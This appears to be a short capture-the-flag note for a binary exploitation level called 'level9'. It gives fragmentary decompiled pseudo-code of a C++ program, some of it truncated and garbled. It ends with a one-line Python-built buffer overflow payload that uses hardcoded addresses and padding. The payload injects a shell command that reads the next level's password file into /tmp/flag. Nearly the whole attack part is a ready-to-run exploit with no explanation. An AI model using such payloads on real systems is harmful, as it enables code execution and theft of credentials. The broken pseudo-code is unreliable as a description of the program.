main:
if (argc < 1)
	exit (1);
truc = _Znwj(0x6c)
truc = _ZN1NC1Ei(truc, 5);
tmp = _Znwj(6, truc 'esp + 0x1c')
truc = _ZN1NC1Ei(tmp, 6)

truc1 [esp + 0x18] = tmp
truc2 [esp + 0x14] = truc
truc3 [esp + 0x10] = truc1

_ZN1N13setAnnotationEPc(esp + 0x14, esp +)

/home/user/level9/level9 $(python -c "print('\x60\x60\xd8\xb7' + 'OSEF' + '\x58\x7c\xea\xb7' + 'DDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZAAAA' + '\xce\xf7\xff\xbf' + '`cat /home/user/bonus0/.pass >/tmp/flag`MMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYY' + '\x5e\x86\x04\x08')")

